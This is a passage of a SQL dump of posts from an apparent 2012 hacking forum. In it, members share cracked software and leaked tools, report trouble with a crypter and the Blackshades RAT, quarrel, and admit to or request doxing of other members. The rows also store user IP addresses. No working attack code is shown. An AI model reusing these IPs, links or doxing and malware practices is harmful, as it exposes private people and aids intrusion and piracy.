`username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3943', '763', '3942', '58', 'RE: [Announcement]Group Changes', '0', '1', 't3h jok3r', '1349727382', '[quote=\'Rave™\' pid=\'3942\' dateline=\'1349727192\'] I would like to take ownership of Unique. I am very HQ and active. I will continue to be so. [/quote] Sorry but I offered Reloadzor first and he accepted the offer.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '768cd691cc0865e8d8ca50e5fdf12217', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3944', '769', '0', '23', 'Math Tools for all Subjects Cracked by Rave', '0', '214', 'Rave™', '1349727396', 'http://www.bagatrix.com/ I used these tools to pass multiple math classes. They really help with solving problems and even teaching you how to do each step. I\'m sure most of you will enjoy these programs! Total Applications: 16 http://www.mediafire.com/?b9ddmpzb3qp14c5 Enjoy!!!!', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '01f3b159cab196a8bccee091746e5dcd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3945', '770', '0', '19', '[Junk]Gyzano JDB', '0', '214', 'Rave™', '1349727499', '[lock]http://www.gamefront.com/files/22412495/...solate.rar[/lock] Leaked from HF ub3r section.', '71.67.179.16', '1195619088', '1', '0', '1', '1352011247', '1', 'bc105390895c8ae8987bbc0011c43154', '0', '1352011247'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3946', '771', '0', '15', 'Skype Resolver Source', '0', '214', 'Rave™', '1349727619', 'Live demo: http://creweu.com/skype/ Download: - [lock]http://creweu.com/skype/index.zip[/lock]', '71.67.179.16', '1195619088', '1', '0', '1', '1352011274', '1', 'cb120b48bc1de56b048cba1f18c443f3', '0', '1352011274'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3947', '772', '0', '58', 'Group Request', '0', '214', 'Rave™', '1349727750', '[b] Hello Joker, I have a request that I am hoping we can discuss on skype I want to start the group with the name something like \"Hackers\" or something related to hackers. This group will be a very HQ group of the most HQ hackers on l33thacking. I hope you accept. If you do, I have a man to do the GFX.[/b]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '7ea71380a2039aba0ab96723d461ec8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3954', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '240', 'Hardz', '1349729823', 'I queued up at my local Apple Store in London to buy the new iPhone - I managed to get one and I must say so far I\'m quite pleased with it. I got it in black as not all applications are optimized for the iPhone 5 and have black bars around them which go fairy un-noticeable on the black iPhone but on the white iPhone you can see them quite easily.', '86.135.61.58', '1451703610', '0', '0', '240', '1349729833', '1', '203fb189f6bf20b65f9f2f6af663d2f9', '0', '1349729833'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3949', '772', '3947', '58', 'RE: Group Request', '0', '1', 't3h jok3r', '1349728081', 'Firstly, I have moved the thread to the right section. Secondly, when it comes to blackhat groups I can\'t really approve them. I can approve any group except complete blackhat groups. If you want the \"Hackers\" group to be approved then you would have to wait for NXK and Apathy to post their opinion. You are free to PM them this thread so they can check this thread out. I don\'t mind having such a group but could you elaborate what exactly this group would be about and how would it benefit L33Thacking? Last but never the least (Did I say that right?), I advise people to please request their new groups [url=http://l33thacking.net/thread-212.html]here[/url]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77d54f52aec1bf2367147ce70900cd35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3950', '772', '3947', '58', 'RE: Group Request', '0', '214', 'Rave™', '1349728341', 'This group will benefit LH because it will attract many many leechers and hackers such like me, to leak, leech from other forums, and post hack tools and will help in the growth of this forum', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '7e68ec606fc85401ef4f4ff89e562a51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3952', '772', '3950', '58', 'RE: Group Request', '0', '1', 't3h jok3r', '1349729048', '[quote=\'Rave™\' pid=\'3950\' dateline=\'1349728341\'] This group will benefit LH because it will attract many many leechers and hackers such like me, to leak, leech from other forums, and post hack tools and will help in the growth of this forum [/quote] We don\'t want leechers etc because then our private methods etc would get saturated.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '652c20261b36e3f35ac8e1ba9847b88c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3953', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '240', 'Hardz', '1349729622', 'Well that\'s pretty strange. He must be really skinny - although I suppose the majority of Chinese people are very tall, skinny, and good at participating in Olympic events.', '86.135.61.58', '1451703610', '0', '0', '0', '0', '1', '83bb669b22c2a38ca568ecd5459275f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3955', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349730242', 'Yeah, it is sirchamp. That\'s why I have it in my signature. :)', '78.149.61.34', '1318403362', '1', '0', '0', '0', '1', '8d43727d6256df071a02892cad263f59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3956', '214', '3750', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '232', 'BreShiE', '1349730293', '[quote=\'Rave™\' pid=\'3750\' dateline=\'1349613260\'] Can someone help me with this? [/quote] What problems are you having?', '78.149.61.34', '1318403362', '1', '0', '0', '0', '1', '11f75343a8cd38c341934496be51d7c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3957', '772', '3947', '58', 'RE: Group Request', '0', '214', 'Rave™', '1349730555', 'That is why we have the private method in the Hackers Method.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '80e071d8b92057b0914c5361bac24718', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3958', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '203', 'NeonLights', '1349731250', 'this doesnt work for me when i crypt my server i run it then the server doesnt open nothing happens [hr] and now its giving me this error: sorry hwid dosnt match WTF', '67.68.75.160', '1128549280', '1', '0', '203', '1349731411', '1', 'cc6b7eeaac4a309040d507dee432a187', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3959', '713', '3640', '12', 'RE: How To Make A FUD Java Drive-By', '0', '203', 'NeonLights', '1349731676', 'rave do u rat ? if so could u send me ur skype in pm i would love to talk with u for a lil :D', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '3c0a8fbdb5d50190010f7294433b2aa8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3960', '773', '0', '9', 'Easy Money, Little Effort', '0', '241', 'Constrain', '1349731685', '[align=center]Hey guys, first post here. I am bringing you a guide on how to easily make a few extra bucks in about 30 minutes. The site is called naturebucks. Now many have heard of this but I will be teaching you guys some methods on how to earn even more money. Register here: [url=http://naturebucks.com/members/register.php?ref=Constrain]Link[/url] Now here are some tips: - Survey companys like a family man who makes money - Do the daily offers, they are easy - Make a fake email, you will get spammed on it, so use it for the surveys Enjoy guys! Proof of earnings: [img]http://i.imgur.com/hxuW9.png[/img] [/align]', '108.18.121.45', '1813149997', '0', '0', '0', '0', '1', '8ca346d961338a40eda871a8f8dd6d25', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3961', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '3', '??????????¢™', '1349734471', 'Anarchy sucks is a fucking skid. Trying to steal members from the best forum so that your shitty forum could become hq and active like LH. GTFO Skid.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '57df0945345bd70dc4acd9f8c6975a1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3962', '392', '1816', '9', 'RE: PPD Niches', '0', '82', 'iTzIpod', '1349734697', 'Go on Leakforums and go on Skill\'s PPD thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3855d9998c5d8278c6fd3dd0da122f9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3963', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349734751', 'Thought we already knew that... -.- ^ And also, I do want to leave. I\'m just checking on what\'s happening.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9858e1e0bbf2b14b5efe54eb05bba529', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3964', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349734793', 'Good luck with that.. ^ Shouldn\'t infect LH members though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2b9e77369c9daa743e62073d8a4db046', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3965', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '82', 'iTzIpod', '1349734833', 'Good luck Reloadzor with Unique in your hands.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a67d5cdd2fcd7388d38a363fba8819d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3966', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '203', 'NeonLights', '1349734847', 'wtf are u talking about its a fucking group... and if i had the intention to come here to infect ppl dont u think id be butt fucked by now? [hr] and apparently anarchy says ur his friend? if so why are u still here', '67.68.75.160', '1128549280', '1', '0', '203', '1349734881', '1', 'f8a610a36c78ee446aa64a87269b646e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3967', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '3', '??????????¢™', '1349735043', 'I have sent a request to flamingworm, when he accepts it hopefully he adds me to the group chat.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'ae409976a00a02c744d780fdde4a925c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3968', '734', '3963', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349735133', '[quote=\'iTzIpod\' pid=\'3963\' dateline=\'1349734751\'] Thought we already knew that... -.- ^ And also, I do want to leave. I\'m just checking on what\'s happening. [/quote] You won\'t stay on L33THacking. To be honest, Anarchy forum is going to fuck you up after you using you and I have stopped caring about you. Anarchist is keep on annoying me by creating fake accounts, I will continue to fuck around with him and his site.', '173.245.64.228', '-1376435996', '1', '0', '1', '1349735342', '1', '01a6dc28a42742e904933c4ca33afe05', '0', '1349735342'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3969', '734', '3963', '3', 'RE: Downtime, PMs and Members', '0', '3', '??????????¢™', '1349735140', '[quote=\'iTzIpod\' pid=\'3963\' dateline=\'1349734751\'] Thought we already knew that... -.- ^ And also, I do want to leave. I\'m just checking on what\'s happening. [/quote] Are you leaving due to issues in your life or are you taking a break?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c4fd64277a4d576c709dea33145012cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3970', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '62', 'R?????zo?', '1349735180', 'thanks, you are welcome anytime to take your previous spot <3', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3491388ee0311cad31d850a98a29a0c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3971', '734', '3969', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349735405', '[quote=\'??????????¢™\' pid=\'3969\' dateline=\'1349735140\'] [quote=\'iTzIpod\' pid=\'3963\' dateline=\'1349734751\'] Thought we already knew that... -.- ^ And also, I do want to leave. I\'m just checking on what\'s happening. [/quote] Are you leaving due to issues in your life or are you taking a break? [/quote] He is leaving because he is scared that Anarchist would release his DOX. I already [b]did[/b] it because either way his info. was going online. Anarchist is next.', '173.245.64.228', '-1376435996', '1', '0', '0', '0', '1', 'a3c429de69a39965f2d0ed270bc945f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3972', '734', '3971', '3', 'RE: Downtime, PMs and Members', '0', '3', '??????????¢™', '1349736114', '[quote=\'t3h jok3r\' pid=\'3971\' dateline=\'1349735405\'] [quote=\'??????????¢™\' pid=\'3969\' dateline=\'1349735140\'] [quote=\'iTzIpod\' pid=\'3963\' dateline=\'1349734751\'] Thought we already knew that... -.- ^ And also, I do want to leave. I\'m just checking on what\'s happening. [/quote] Are you leaving due to issues in your life or are you taking a break? [/quote] He is leaving because he is scared that Anarchist would release his DOX. I already [b]did[/b] it because either way his info. was going online. Anarchist is next. [/quote] So you do not care for him anymore?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '56834f7041805f4ae8a5c71aa5ea5c6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3973', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '203', 'NeonLights', '1349736280', 'no porn unless warned? LOL ok adding u guys right now :O', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'bd1947baedb683353bc98839666d8115', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3974', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '82', 'iTzIpod', '1349736366', 'Why\'d I get kicked? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ae17a1d8ef0126ecc788d2fcfe5836f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3975', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '82', 'iTzIpod', '1349736483', 'Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a883466e75f7f0f7a964b54afd1cd639', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3976', '759', '3974', '7', 'RE: Join the LH Skype Group!', '0', '3', '??????????¢™', '1349736501', '[quote=\'iTzIpod\' pid=\'3974\' dateline=\'1349736366\'] Why\'d I get kicked? :/ [/quote] I am guessing because you are no longer apart of LH and because you are on Anarchist side MAYBE.', '75.38.19.52', '1260786484', '1', '0', '3', '1349736510', '1', 'bb78e8488a76c940f82404f8239accb6', '0', '1349736510'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3977', '672', '3409', '30', 'RE: Blackshades NET [Setup + download]', '0', '203', 'NeonLights', '1349736520', 'doesnt work -.- whenever i enter my ports and click activate i dont receiver any victims... the ports dont work but there forwarded', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'ab804bc41af1bf6522ac868c035f268d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3978', '747', '3975', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '3', '??????????¢™', '1349736548', '[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\'] Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online? [/quote] Dont get mad now little one.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'e3f09dfef8d170b21ea8e6585f04fcf8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3979', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349736625', 'I didn\'t say it was a group. Or I didn\'t say it was not a group. I just said Good luck with that. I didn\'t mean to say Oh you shouldn\'t infect members on LH with your RATs. I just meant. Just be sure not to infect members with your RAT on LH. Just because I\'m AF\'s friend, doesn\'t mean I can\'t go on L33tHacking does it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5215fb15a9baa4632ca12c187ab1e3d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3980', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '82', 'iTzIpod', '1349736656', 'It\'s alright. You deserve it .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '85e7b119b3adeb66746f431f7044178a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3981', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349736719', 'So you admit you released my dox... -.- Alright. I see how it is. I guess we\'re no longer friends.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '294e70ab1b20c54c5b15a4c363f7ed7d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3982', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '3', '??????????¢™', '1349736997', 'lol jok3r send me his dox if you dont mind. Time to get revenge for treating me bad.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '70e42d012ae24089a27ecc0d75e700ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3983', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '3', '??????????¢™', '1349737717', 'Hopefully the new owner could keep the group active and HQ.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '810699c10e20b0e55e4f4a250e5e4b20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3984', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '203', 'NeonLights', '1349742192', 'why no one adding me -.- i sent request to both of u D:', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'e9ac1a0db0e1b9afe92894ad3c9509a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3985', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '82', 'iTzIpod', '1349743670', 'NeonLights why did you delete me :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '91fb8e758b5ef0cbcf916b03a2176965', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3986', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349743759', '??????????¢™ If you dare do anything, I\'ll get MY Revenge back on you. + Release A lot/All of my anger on you. I\'ll know if it was you or not.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e64863a85f35fc097da318410f2a9881', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3987', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '82', 'iTzIpod', '1349743799', 'He can. I know Reloadzor can. It\'s in his blood. Or, iTzGRONGamer61 can do it too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '32291d2bec3778bf87c7b3a1f1e70092', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3988', '734', '3982', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349745388', '[quote=\'??????????¢™\' pid=\'3982\' dateline=\'1349736997\'] lol jok3r send me his dox if you dont mind. Time to get revenge for treating me bad. [/quote] Dude there\'s no need for anyone to have his DOX anymore because he doesn\'t not know what he\'s doing. @Ipod don\'t talk when you don\'t know what\'s going on. I\'m not threathening or saying that I will do anything what I\'m saying is you don\'t think before you do and people are starting to take advantage of you.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '58f52d91a1a78d6dceeb5b84f8410c6f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3989', '212', '3979', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1349745689', '[quote=\'iTzIpod\' pid=\'3979\' dateline=\'1349736625\'] I didn\'t say it was a group. Or I didn\'t say it was not a group. I just said Good luck with that. I didn\'t mean to say Oh you shouldn\'t infect members on LH with your RATs. I just meant. Just be sure not to infect members with your RAT on LH. Just because I\'m AF\'s friend, doesn\'t mean I can\'t go on L33tHacking does it? [/quote] Well you do have a point, you are welcome to L33THacking but like everyone if someone violates LH rules then they either get a warning or get banned.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5e5ed85e6f69f5c92e97c33917b7f384', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, 